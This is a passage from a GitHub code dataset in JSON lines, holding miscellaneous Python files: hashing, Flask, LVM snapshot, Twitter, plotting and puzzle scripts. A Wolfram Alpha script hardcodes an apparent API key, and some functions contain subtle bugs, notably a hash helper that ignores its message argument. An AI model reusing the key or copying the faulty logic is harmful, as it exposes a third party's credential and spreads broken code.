parser.add_argument('--down_scale',type=float,default=0.95)\n parser.add_argument('--down_weight',type=float,default=5)\n\n args = parser.parse_args()\n\n if not os.path.exists(os.path.join('checkpoints', args.experiment)):\n os.makedirs(os.path.join('checkpoints', args.experiment))\n if not os.path.exists(os.path.join('checkpoints', args.experiment, 'outputs')):\n os.makedirs(os.path.join('checkpoints', args.experiment, 'outputs'))\n\n log = logger(os.path.join('checkpoints', args.experiment))\n log.info(str(args))\n\n train(args)\n","repo_name":"Red-Fairy/ZeroShotDayNightDA","sub_path":"darkening/darken_vpr.py","file_name":"darken_vpr.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"22"} +{"seq_id":"8036197954","text":"import secrets\n\nfrom blake3 import blake3\n\n\ndef computeInputValue(bitcoin_address: bytes, message: bytes):\n # compute the bitcoin_address_hash\n bitcoin_address_hash = blake3(bitcoin_address).digest()\n # compute the message hash\n message_hash = blake3(bitcoin_address).digest()\n # compute the input by concatenating the bitcoin_address_hash\n # with the message hash\n input_value = bitcoin_address_hash + message_hash\n return input_value\n\n\n# this function produces the hash\ndef produce(\n bitcoin_address: bytes,\n message: bytes,\n application: str, timestamp: str, purpose: str, nounce=None):\n # compute the input value\n input_value = computeInputValue(bitcoin_address, message)\n # generate the random nounce if needed\n random_nounce = None\n if nounce is None:\n random_nounce = secrets.token_bytes(32)\n else:\n random_nounce = nounce\n # derive the key\n context = application + timestamp + purpose\n derived_key = blake3(random_nounce, derive_key_context=context).digest()\n # compute the hash\n _hash = blake3(input_value, key=derived_key).digest()\n return _hash, derived_key\n\n\n# this function allows to verify the hash\n# from verification data we have\n# * derived_key\n# * message\n# and from transaction data we have\n# * bitcoin_address\n# from the block\n# * _hash\ndef verify(derived_key: bytes,\n bitcoin_address: bytes,\n message: bytes,\n _hash: bytes):\n # compute the input value\n input_value = computeInputValue(bitcoin_address, message)\n # re-calculate the hash\n recalculated_hash = blake3(input_value, key=derived_key).digest()\n assert recalculated_hash == _hash\n","repo_name":"Blockfinance-ECO/Bitcoin-Value-Assert","sub_path":"bva.py","file_name":"bva.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7450455745","text":"from flask import Flask, render_template, request, redirect\nimport csv\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/submit_form', methods=['GET', 'POST'])\ndef submit_form():\n global data\n if request.method == 'POST':\n try:\n data = request.form.to_dict()\n #print(data[\"name\"], data[\"email\"])\n write_to_csv(data)\n return 'Thanks for submitting!!'\n\n except:\n return 'Your data was not saved to database!!!'\n\n else:\n return 'Something Went Wrong!!!'\n\n\n\n\ndef write_to_csv(data):\n with open('./database.csv','a', newline='') as dbfile2:\n name=data[\"name\"]\n email= data[\"email\"]\n dist= data[\"dist\"]\n location= data[\"location\"]\n csvWriter = csv.writer(dbfile2, delimiter=',',\n quotechar='|' ,quoting=csv.QUOTE_MINIMAL)\n csvWriter.writerow([name,email,dist,location])\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"arnabchat123/oxygen","sub_path":"oxy.py","file_name":"oxy.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33406058527","text":"class Solution:\n def minimumDistance(self, word: str) -> int:\n \n \n def distance(x,y):\n r1,c1 = (ord(x) - ord('A')) // 6,(ord(x) - ord('A')) % 6\n r2,c2 = (ord(y) - ord('A')) // 6,(ord(y) - ord('A')) % 6\n return abs(r1 - r2) + abs(c1 - c2) \n \n \n @cache\n def dfs(i,f1,f2):\n \n if i >= len(word):\n return 0\n \n res = float('inf')\n \n if f1 != '':\n #move finger1\n res = min(res, dfs(i + 1,word[i], f2) + distance(f1,word[i]))\n else:\n res = min(res, dfs(i + 1,word[i], f2))\n if f2 != '':\n #move finger2\n res = min(res, dfs(i + 1,f1, word[i]) + distance(f2,word[i]))\n else:\n res = min(res, dfs(i + 1,f1, word[i]))\n \n \n return res\n \n return dfs(0,'','')","repo_name":"tannerr12/Data-Structures-and-Algorithms","sub_path":"1320-minimum-distance-to-type-a-word-using-two-fingers/1320-minimum-distance-to-type-a-word-using-two-fingers.py","file_name":"1320-minimum-distance-to-type-a-word-using-two-fingers.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"10618705376","text":"from decimal import *\r\nfrom datetime import *\r\nfrom Tarifa import *\r\n\r\ndef calcularPrecio(tarifa, tiempoDeTrabajo):\r\n \r\n precioSemana = tarifa.getPrecio()\r\n precioFindeSemana = tarifa.getPrecio()\r\n \r\n \r\n #Chequeamos que los valores sean validos.\r\n if (precioSemana < 0):\r\n raise ValueError('La tarifa de la semana no debe ser negativa',precioSemana)\r\n \r\n if (precioFindeSemana < 0):\r\n raise ValueError('La tarifa del fin de semana no debe ser negativa',precioFindeSemana)\r\n \r\n if (tiempoDeTrabajo[0] < tiempoDeTrabajo[1]):\r\n raise ValueError('Tiempo de trabajo negativo!',tiempoDeTrabajo[0],tiempoDeTrabajo[1])\r\n \r\n aux = (tiempoDeTrabajo[1] - tiempoDeTrabajo[0])\r\n \r\n if (aux.day == 0 and aux.year == 0 and aux.month == 0 and aux.hour == 0 and aux.minute < 15):\r\n raise ValueError('Tiempo de trabajo menor a 15 minutos!',tiempoDeTrabajo[0],tiempoDeTrabajo[1])\r\n \r\n if (aux.day > 7 or (aux.day == 7 and aux.hour > 0)):\r\n raise ValueError('El Tiempo de trabajo debe ser menor a 7 dias',tiempoDeTrabajo[0],tiempoDeTrabajo[1])\r\n \r\n #Inicializamos valores para el ciclo\r\n aux = tiempoDeTrabajo[0]\r\n aux2 = timedelta(hours=1)\r\n prevDay = 0\r\n tarifa = Decimal(0)\r\n \r\n \r\n while (aux < tiempoDeTrabajo[1]):\r\n \r\n #Se suman las tarifas en caso de ser cualquier dia (0 siendo lunes, 6 siendo domingo)\r\n if (aux.weekday < 5):\r\n tarifa += precioSemana\r\n else:\r\n tarifa += precioFindeSemana\r\n\r\n\r\n # Estos proximos ifs implementan el cambio de precio cuando se va de un dia de semana\r\n # a uno que es fin de semana y viceversa \r\n if (prevDay == 6 and aux.weekday == 0):\r\n tarifa += precioSemana\r\n elif (prevDay == 4 and aux.weekday == 5):\r\n tarifa += precioFindeSemana\r\n \r\n prevDay = aux.weekday\r\n aux += aux2\r\n \r\n return tarifa","repo_name":"Imme2/SoftwareTarea2","sub_path":"calcularPrecio.py","file_name":"calcularPrecio.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"4504416080","text":"import requests\nimport json\n\ndef find_proper_image(json_result):\n pods = json_result[\"queryresult\"][\"pods\"]\n for pod in pods:\n if \"Visual representation of\" in pod[\"title\"]:\n return pod[\"subpods\"][0][\"img\"][\"src\"]\n if \"illustration\" in pod[\"title\"]:\n return pod[\"subpods\"][0][\"img\"][\"src\"]\n return None\n\ndef save_image(query, filename):\n base_url = \"http://api.wolframalpha.com/v2/query\"\n params = {\n \"input\": query,\n \"format\": \"image\",\n \"output\": \"JSON\",\n \"appid\": \"QQ9932-7PXA4JPRGK\",\n }\n\n response = requests.get(base_url, params=params)\n\n if response.status_code == 200:\n result = response.json()\n\n else:\n print(f\"Error: {response.status_code} - {response.text}\")\n\n url = find_proper_image(result)\n if url is None:\n print(\"No valid url found\")\n return 0\n \n response = requests.get(url)\n\n if response.status_code == 200:\n # The file content is stored in response.content\n with open(filename, \"wb\") as f:\n f.write(response.content)\n print(\"File downloaded successfully.\")\n return 1\n else:\n print(f\"Failed to download the file. Status code: {response.status_code}\")\n return 0\n\n# with open(\"sample.json\", \"w\") as outfile:\n# outfile.write(json.dumps(result[\"queryresult\"][\"pods\"], indent=4))","repo_name":"zacn04/Scribe","sub_path":"latex_to_response/image_handling.py","file_name":"image_handling.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26943721059","text":"# coding:utf-8\nimport os,re\n'''\n所有文件路径创建\n'''\n\n#获取根路径\ndef Root_path():\n file_address=os.path.dirname(os.path.realpath(__file__)).replace('\\\\', '/')\n root_Path=re.search(r'(.*)Public_methods',file_address)\n return root_Path.group(1)\n\n#confing路径\ndef crg_path():\n crg_file=os.path.join(Root_path(),'Public_methods/crg_file/')\n if not os.path.exists(crg_file):os.makedirs(crg_file)\n ini_file=crg_file+'crg_file.ini'\n return ini_file\n\n\n\nif __name__=='__main__':\n print(crg_path())\n","repo_name":"270466585/my_django","sub_path":"Public_methods/file_path.py","file_name":"file_path.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36778492694","text":"#!/usr/bin/env python3\n\n# SPDX-License-Identifier: MIT\n\n'''\nfile : plot_electric_field\ndate : 17/07/2023\n\nDiagnostic for (X,Y,Vx,Vy) geometry\n\n-----> Simple usage: python3 plot_electric_field.py ../../../build/simulations/geometryXYVxVy/landau/ --itime 10 \n-----> Animation: python3 plot_electric_field.py ../../../build/simulations/geometryXYVxVy/landau/ --gif True\n\n'''\n\n# pylint: disable=invalid-name\n# pylint: disable=wrong-import-order\n\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nfrom scipy import interpolate, stats\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nfrom gysdata import DiskStore\nfrom plot_utils import plot_field2d\n\nimport imageio.v2 as imageio\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n description='Plots the electric field')\n parser.add_argument('data_dir',\n action='store',\n nargs='?',\n default=Path.cwd(),\n type=Path,\n help='location of the results')\n parser.add_argument('--gif',\n action='store',\n default=False,\n type=bool,\n help='produce animation')\n parser.add_argument('--itime',\n action='store',\n default=-1,\n type=int,\n help='time index')\n parser.add_argument('--grate',\n metavar='',\n action='store',\n default=-0.1533,\n type=float,\n help='theoritical growth rate')\n\n args = parser.parse_args()\n\n # Load data\n theo_rate = args.grate\n data_structure_name = 'data_structure_XYVxVy.yaml'\n ds = DiskStore(args.data_dir, data_structure=Path(data_structure_name))\n epot = ds['electrostatic_potential']\n fdistribu = ds['fdistribu']\n Ex = -epot.differentiate('x')\n Ey = -epot.differentiate('y')\n Timer = epot.shape[0]\n time_init = epot.coords['time'].values[0]\n time_diag = epot.coords['time'].values[args.itime]\n time_final = epot.coords['time'].values[-1]\n\n output_filename = os.path.join(Path.cwd(), f'electric_energy_t{time_diag}.png')\n data_dict = {f't={time_init}': epot.sel(time=time_init),\n f't={time_diag}': epot.sel(time=time_diag)}\n\n def plot_electric_potential(itime):\n '''\n Plot electric potential\n '''\n output_filename_epot = os.path.join(Path.cwd(), 'electric_potential.png')\n plot_field2d(epot[itime,:,:].T , '', output_filename_epot, cmap='jet', scale='linear')\n\n\n def plot_electric_field(itime):\n '''\n Plot electric field\n '''\n\n output_filename_Ex = os.path.join(Path.cwd(), 'electric_field_x.png')\n plot_field2d(Ex[itime-1,:,:].T , '', output_filename_Ex, cmap='jet', scale='linear')\n\n output_filename_Ey = os.path.join(Path.cwd(), 'electric_field_y.png')\n plot_field2d(Ey[itime-1,:,:].T , '', output_filename_Ey, cmap='jet', scale='linear')\n\n def plot_electric_energy_density_field(itime):\n '''\n Plot electric energy density field\n '''\n\n z = np.power(Ex[itime-1,:,:],2)+np.power(Ey[itime-1,:,:],2)\n output_filename_U = os.path.join(Path.cwd(), 'electric_energy_density_field.png')\n plot_field2d(z, '', output_filename_U, cmap='jet', scale='linear')\n\n\n def compute_electric_energy():\n '''\n Before displaying energy we have to perform a two-dimensional integration.\n For that we first interpolate the Electric field over the x,y plane.\n '''\n\n Energy = np.zeros(Timer)\n for k in range(1,Timer):\n z = np.power(Ex[k,:,:],2)+np.power(Ey[k,:,:],2)\n val = interpolate.RectBivariateSpline(epot.coords['x'].to_numpy(),\n epot.coords['y'].to_numpy(),z)\n Energy[k] = val.integral(epot.coords['x'].values[0], epot.coords['x'].values[-1],\n epot.coords['y'].values[0],epot.coords['y'].values[-1])\n return Energy\n\n def plot_electric_energy():\n '''\n Plot potential energy.\n '''\n\n Energy = compute_electric_energy()\n Emaxval = []\n tm = []\n for k in range(5,len(Energy)-2):\n if((Energy[k+1]-Energy[k-1])/Energy[k]< 0.05 and\n (Energy[k]-Energy[k-2])/Energy[k]> 0.1 and (Energy[k]-Energy[k+2])/Energy[k]>0.1):\n Emaxval.append(Energy[k])\n tm.append(epot.coords['time'].values[k])\n\n Emax = np.array(Emaxval)\n tm = np.array(tm)\n if Emax.size>0:\n res = stats.linregress(tm,np.log(np.sqrt(Emax)))\n print(f'relative error on growth rate {(theo_rate-res[0]) /abs(res[0]):0.2f}')\n plt.clf()\n plt.plot(epot.coords['time'].values,np.log(np.sqrt(Energy)))\n plt.scatter(tm ,np.log(np.sqrt(Emax)),c='red')\n if Emax.size>0:\n plt.plot(tm ,tm*res[0]+res[1] ,c='green')\n plt.title(f'growthrate: {res[0]:0.3f} (theory: {theo_rate:0.3f})', fontsize=16)\n plt.ylabel('Electric energy', fontsize=12)\n plt.xlabel('time', fontsize=12)\n plt.savefig('Electric_energy.png')\n\n def plot_fdist(itime,Vx,Vy):\n '''\n Plot the initial distribution function in (X,Y) fo a fixed (Vx, Vy) velocity position.\n '''\n\n plt.clf()\n fig = plt.figure()\n ax = fig.add_subplot()# 111,projection='3d')\n im = ax.imshow(fdistribu[itime,0,:,:,Vx,Vy] )\n fig.colorbar(im)\n plt.title('initial distribution function at Vx='+str(Vx)+' Vy='+str(Vy))\n plt.savefig('test_fdistribution.png')\n\n if (not(args.gif)):\n plot_electric_potential(args.itime)\n plot_electric_field(args.itime)\n plot_electric_energy_density_field(args.itime)\n plot_electric_energy()\n plot_fdist(args.itime,31,31)\n\n else:\n min_efield = min([np.min(Ex),np.min(Ey)]).compute()\n max_efield = max([np.max(Ex),np.max(Ey)]).compute()\n min_epot = np.min(epot).compute()\n max_epot = np.max(epot).compute()\n min_energy_den = np.min(np.power(Ex,2)+np.power(Ey,2)).compute()\n max_energy_den = np.max(np.power(Ex,2)+np.power(Ey,2)).compute()\n\n images = []\n for itime in range(Timer):\n plot_field2d(epot[itime-1,:,:].T , '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_epot, vmax=max_epot, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_potential.gif', images)\n\n images = []\n for itime in range(Timer):\n plot_field2d(Ex[itime-1,:,:].T , '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_efield, vmax=max_efield, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_field_x.gif', images)\n\n images = []\n for itime in range(Timer):\n plot_field2d(Ey[itime-1,:,:].T , '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_efield, vmax=max_efield, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_field_y.gif', images)\n\n images = []\n for itime in range(Timer):\n z = np.power(Ex[itime-1,:,:],2)+np.power(Ey[itime-1,:,:],2)\n plot_field2d(z, '', os.path.join(Path.cwd(), 'temp.png'), vmin=min_energy_den, vmax=max_energy_den, cmap='jet', scale='linear')\n images.append(imageio.imread(os.path.join(Path.cwd(), 'temp.png')))\n imageio.mimsave('electric_energy_density_field.gif', images)\n","repo_name":"gyselax/gyselalibxx","sub_path":"post-process/PythonScripts/geometryXYVxVy/plot_electric_field.py","file_name":"plot_electric_field.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"22"} +{"seq_id":"20645903731","text":"import logging\nimport time\nfrom functools import wraps\nfrom typing import Any, Callable\n\nlogger = logging.getLogger()\n\n\ndef backoff(\n exceptions: tuple,\n start_sleep_time: float = 0.1,\n factor: int = 2,\n border_sleep_time: int = 10,\n log: logging = logger\n) -> Callable[..., Any]:\n \"\"\"\n Функция для повторного выполнения функции через некоторое время,\n если возникла ошибка. Использует наивный экспоненциальный рост\n времени повтора (factor) до граничного времени ожидания\n (border_sleep_time)\n\n Формула:\n t = start_sleep_time * 2^(n) if t < border_sleep_time\n t = border_sleep_time if t >= border_sleep_time\n :param exceptions: перехватываемые исключения\n :param start_sleep_time: начальное время повтора\n :param factor: во сколько раз нужно увеличить время ожидания\n :param border_sleep_time: граничное время ожидания\n :param log: объект логгирования\n :return: результат выполнения функции\n \"\"\"\n\n def func_wrapper(func):\n @wraps(func)\n def inner(*args, **kwargs):\n t = start_sleep_time\n while True:\n try:\n return func(*args, **kwargs)\n except exceptions as err:\n log.exception(err)\n t = t * factor\n if t > border_sleep_time:\n t = border_sleep_time\n time.sleep(t)\n\n return inner\n\n return func_wrapper\n","repo_name":"Oorzhakau/new_admin_panel_sprint_3","sub_path":"etl/utils/backoff.py","file_name":"backoff.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"8201307291","text":"import sys\nfrom pylab import *\nimport matplotlib.patches as mpatches\n\nfilename = \"Software_HighestResolution_AverageResolution.csv\"\n\n# Data Reading and Checking \nlines = open(filename, \"r\").readlines();\nX = [line.strip().split(\",\")[0] for line in lines]\nhighest = [line.strip().split(\",\")[1] for line in lines]\naverage = [line.strip().split(\",\")[3] for line in lines]\nX.pop(0)\nhighest.pop(0)\naverage.pop(0)\n\nhighest = [float(y) for y in highest]\naverage = [float(y) for y in average]\n\nwidth = 0.3\nhighestPos = [x + width / 2 for x in range(len(X))]\naveragePos = [x + width / 2 * 3 for x in range(len(X))]\n\nfigure(figsize = (10, 5), dpi = 80)\n\nbar(highestPos, highest, width, color = \"red\", alpha = 0.5)\nbar(averagePos, average, width, color = \"blue\", alpha = 0.5)\n\nfor i in range(len(X)):\n text(highestPos[i] - 0.03, highest[i] + 0.3, \"%2.1f\"%highest[i])\n text(averagePos[i] - 0.03, average[i] + 0.3, \"%2.1f\"%average[i])\n\nxticks(averagePos, X)\nylabel(r\"Resolution $\\AA$\")\n\nred_patch = mpatches.Patch(color = \"red\", label = \"Highest Resolution\", alpha =\n 0.5)\nblue_patch = mpatches.Patch(color = \"blue\", label = \"Average Resolution\", alpha\n = 0.5)\n\nlegend(handles = [red_patch, blue_patch])\n\nsavefig(\"Software_Resolution.png\", dpi = 200)\nshow()\n","repo_name":"Zarrathustra/Script","sub_path":"Plot_Scripts/Software_Resolution_Plot.py","file_name":"Software_Resolution_Plot.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36904056606","text":"from os.path import islink\nimport subprocess\nimport mysql_backup.mysql_backup\n\n\nclass LvSnapshot:\n \"\"\"Class to manage lv snapshots\"\"\"\n\n backup_logger = None\n\n def __init__(self, vg, lv, snapshot_name, size_gb):\n \"\"\"provide vg,lv, snapshot_name, and size_mb (snapshot allocation size) to this constructor\"\"\"\n\n self.vg = vg\n self.lv = lv\n self.snapshot_name = snapshot_name\n self.size_gb = size_gb\n LvSnapshot.backup_logger = mysql_backup.mysql_backup.MysqlBackup.backup_logger\n\n def __str__(self):\n return \"/\" + self.vg + \"/\" + self.lv + \"/\" + self.snapshot_name + \" snapshot instance\"\n\n def get_snapshot_status(self, is_mounted=False):\n \"\"\"return: Bool\n Whether or not a snapshot already exists. If is_mounted is True\n will return True only when the snapshot exists and is mounted.\"\"\"\n if not is_mounted:\n return islink('/dev/'+self.vg+'/'+self.snapshot_name)\n elif islink('/dev/'+self.vg+'/'+self.snapshot_name):\n cmd = ['/sbin/lvdisplay', '-c', '/dev/'+self.vg+'/'+self.snapshot_name,]\n output = int(subprocess.check_output(cmd, close_fds=True).split(':')[5])\n if output:\n return True\n else:\n return False\n else:\n return False\n\n def ensure_snapshot_exists(self):\n \"\"\"return: void\n Ensures a snapshot exists or raises an IOError\"\"\"\n\n if not self.get_snapshot_status():\n\n cmd = ['/sbin/lvcreate', '--snapshot', '-L', str(self.size_gb)+'G', '--name', self.snapshot_name,\n '/dev/'+self.vg+'/'+self.lv]\n\n LvSnapshot.backup_logger.info(\"Snapshot does not exist. Attempting the following command:\\n \" + \" \".join(cmd),\n extra={'object': self})\n\n lv_snap = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)\n lv_snap.wait()\n\n if not self.get_snapshot_status():\n raise IOError(\"Failed to create snapshot named %s at /dev/%s/%s of size %d\" %\n (self.snapshot_name, self.vg, self.lv, self.size_gb))\n\n def delete_snapshot(self):\n \"\"\"Remove a snapshot. Will raise IOError on failure.\"\"\"\n\n if self.get_snapshot_status(is_mounted=True):\n raise IOError(\"Failed to delete snapshot. Snapshot is currently mounted.\")\n\n if self.get_snapshot_status():\n\n cmd = ['/sbin/lvremove', '-f', '/dev/'+self.vg+'/'+self.snapshot_name]\n\n LvSnapshot.backup_logger.info(\"Removing snapshot with the following command: \\n\" + ' '.join(cmd), extra={'object': self})\n\n lv_snap = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)\n lv_snap.wait()\n\n if self.get_snapshot_status():\n msg = \"Failed to delete the snapshot.\"\n LvSnapshot.backup_logger.error(msg, extra={'object': self})\n raise IOError(msg)\n\n else:\n msg = \"Failed to delete snapshot. Snapshot does not exist.\"\n LvSnapshot.backup_logger.error(msg, extra={'object': self})\n raise IOError(msg)\n\n def safe_refresh_snapshot(self):\n \"\"\"If the snapshot is not mounted, delete it and recreate it\"\"\"\n\n LvSnapshot.backup_logger.info(\"Begin refreshing snapshot at /dev/%s/%s\" % (self.vg, self.snapshot_name),\n extra={'object': self})\n\n if not self.get_snapshot_status(is_mounted=True):\n\n LvSnapshot.backup_logger.debug(\"Snapshot is not mounted.\", extra={'object': self})\n\n if self.get_snapshot_status():\n LvSnapshot.backup_logger.debug(\"Snapshot exists. Deleting it.\", extra={'object': self})\n self.delete_snapshot()\n else:\n LvSnapshot.backup_logger.debug(\"Snapshot did not exist. Nothing to delete.\", extra={'object': self})\n\n LvSnapshot.backup_logger.info(\"Snapshot now removed if it was there. Ensuring one exists.\", extra={'object': self})\n\n self.ensure_snapshot_exists()\n\n else:\n LvSnapshot.backup_logger.info(\"Snapshot was mounted, not refreshing it.\", extra={'object': self})\n\n if not self.get_snapshot_status():\n msg = \"Snapshot still does not exist. Something went bad.\"\n LvSnapshot.backup_logger.error(msg, extra={'object': self})\n raise IOError(msg)\n else:\n msg = \"Snapshot verified to exist.\"\n LvSnapshot.backup_logger.info(msg, extra={'object': self})\n","repo_name":"dmatthewsbnd251/mysql-backup","sub_path":"lv_snapshot/lv_snapshot.py","file_name":"lv_snapshot.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"22862189358","text":"# 必要なモジュールのimport\nimport pandas as pd\nimport tweepy\n# 各種ツイッターのキーをセット\n# 各種ツイッターのキーをセット consumer_key, consumer_secret, access_key, access_secret\nconsumer_key = \"\"\nconsumer_secret = \"\"\naccess_key = \"\"\naccess_secret = \"\"\n# 認証のためのAPIキーをセット\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_key, access_secret)\napi = tweepy.API(auth, wait_on_rate_limit=True) # API利用制限にかかった場合、解除まで待機する\n\n\ndef main():\n '''\n メインの実行部分\n '''\n\n # 調べる言語のリストの用意\n languages = [\"JavaScript\", \"Python\", \"TypeScript\", \"Java\", \"C++\", \"Go\",\n \"Rust\", \"C\", \"Shell\", \"Vue\", \"Dart\", \"CSS\", \"C#\", \"PHP\",\n \"Clojure\", \"Assembly\", \"Ruby\"]\n like = []\n # for文を使ってリストに入っている言語ごとにデータを取得していく 取得するデータは今日から過去7日以内\n for language in languages:\n tweet_data = get_search_tw(language, '2021-03-20_00:00:00_JST',\n '2021-03-21_00:00:00_JST', 1, 50)\n # 取得したデータからデータフレームを作成\n df = make_df(tweet_data)\n # いいね数の総和を求めてリストに追加\n like.append(df['いいね数'].sum())\n # 言語ごとのいいね数を出力する\n print(f'{language}の合計いいね数は{df[\"いいね数\"].sum()}')\n # 言語名といいね数の情報からデータフレームを作成する\n df = pd.DataFrame({'言語': languages, 'いいね数': like})\n # いいね数の多い順にデータを並べ変える\n print('結果')\n print(df.sort_values(by='いいね数', ascending=False))\n # 期間を指定して、ツイートを収集する関数\n\n\ndef get_search_tw(search, since, until, recount, count):\n '''\n 今日から過去7日間の期間を指定して、ツイートを収集する関数\n ツイートのデータをapi.searchを使って収集\n '''\n\n # 検索キーワード。 リツイートは除く\n searchkey = search + '-filter:retweets'\n # ツイート取得\n # APIのtweepy.Cursorのキーワードサーチ(api.search)を使う\n tweets = tweepy.Cursor(api.search, q=searchkey, since=since,\n until=until, tweet_mode=\"extended\", lang='ja'\n ).items(count)\n # ツイートデータを入れる空のリストを用意\n tweet_data = []\n # いいねとリツイートの合計がrecuont以上なら次からの処理をする\n for tweet in tweets:\n if tweet.retweet_count + tweet.favorite_count >= recount:\n tweet_data.append([search, tweet.favorite_count])\n return tweet_data\n\n\n'''\n ツイートデータを番号と共に出力\n '''\n\n\ndef make_df(tweet_data):\n '''\n ツイートのデータからデータフレームを作成\n '''\n\n # 各ツイートデータを入れるための空のリストを用意\n list_language = []\n list_favorite = []\n i = 0\n # ツイートの各アイテムを入れるリストを作成\n for i in range(len(tweet_data)):\n list_language.append(tweet_data[i][0])\n list_favorite.append(tweet_data[i][1])\n i += 1\n # 上で作成したリストからツイートを入れるデータフレームの作成\n df = pd.DataFrame({'言語': list_language, 'いいね数': list_favorite})\n return df\n\n\n# 実行部分\nif __name__ == '__main__':\n main()\n","repo_name":"Sebun-Takahashi/Python-training","sub_path":"language-rank/tweetkeaworddate-copy.py","file_name":"tweetkeaworddate-copy.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31591868811","text":"#pip install speedtest-cli\nimport speedtest as sp\nimport sys\n\ntest = sp.Speedtest()\n\ndown = test.download()\nrsDown = round(down)\nfDown = int(rsDown/1e+6)\n\nupload = test.upload()\nrsUp = round(upload)\nfUp=int(rsUp/1e+6)\n\nprint(f\"Down:{fDown} mb/Up:{fUp} mb\")\n\n","repo_name":"vaesanti/scripts","sub_path":"veloz.py","file_name":"veloz.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41412023159","text":"import numpy as np\nfrom collections import defaultdict\nfrom pathlib import Path\n\nDIRECTIONS = {'e' : np.array([1,0]) , 'se':np.array([0,1]), 'sw':np.array([-1,1]),\n 'w':np.array([-1,0]), 'nw':np.array([0,-1]), 'ne':np.array([1,-1])}\n\ndef get_starting_black_tiles(tot_commands):\n tiles = defaultdict(int)\n for command in tot_commands:\n current_pos = np.array([0,0])\n for direction in command:\n current_pos += DIRECTIONS[direction]\n tiles[tuple(current_pos)] += 1\n return set([key for key,val in tiles.items() if val % 2])\n\ndef neighbors(tile):\n for direction in DIRECTIONS.values():\n yield tuple(tile + direction)\n\ndef get_num_of_neighbors(tile, tiles):\n return len([neighbor for neighbor in neighbors(tile) if tuple(neighbor) in tiles])\n\ndef part2_iteration(tiles):\n new_tiles = set()\n for tile in tiles:\n num_neighbors = get_num_of_neighbors(tile,tiles)\n if 0 < num_neighbors <= 2:\n new_tiles.add(tile)\n for neighbor in neighbors(tile):\n if tuple(neighbor) not in tiles and get_num_of_neighbors(neighbor,tiles) == 2:\n new_tiles.add(neighbor)\n return new_tiles\n\ndef parse_input(inp):\n total_commands = []\n for line in inp.splitlines():\n commands = []\n tmp = ''\n for char in line:\n tmp += char\n if tmp in DIRECTIONS:\n commands.append(tmp)\n tmp = ''\n total_commands.append(commands)\n return total_commands\n\ndef run_test():\n inp = 'nwwswee'\n tot_commands = parse_input(inp)\n get_starting_black_tiles(tot_commands) == [(0,0)]\n with open(Path(\"2020\") / \"day24\" / \"day24_test.txt\") as f:\n inp = f.read()\n tot_commands = parse_input(inp)\n tiles = get_starting_black_tiles(tot_commands)\n assert len(tiles) == 10\n assert len(part2_iteration(tiles)) == 15\nrun_test()\n\nwith open(Path(\"2020\") / \"day24\" / \"day24_input.txt\") as f:\n inp = f.read()\nblack_tiles = get_starting_black_tiles(parse_input(inp))\nprint(f\"Answer part 1 {len(black_tiles)}\")\n\nfor _ in range(100):\n black_tiles = part2_iteration(black_tiles)\n\nprint(f'Answer part 2 {len(black_tiles)}')\n","repo_name":"GandolfHobbitlord/adventofcode","sub_path":"2020/day24/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12887908679","text":"import re\nfrom torch import nn\nimport itertools as it\nimport torch\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport logging\nimport time\nimport pandas as pd\n\n\n# Begin read file\ndevice = torch.device('cuda:0')\n\ndef read_input():\n file_dir = r'methylation/train.csv'\n training_df = pd.read_csv(file_dir)\n training_seq = 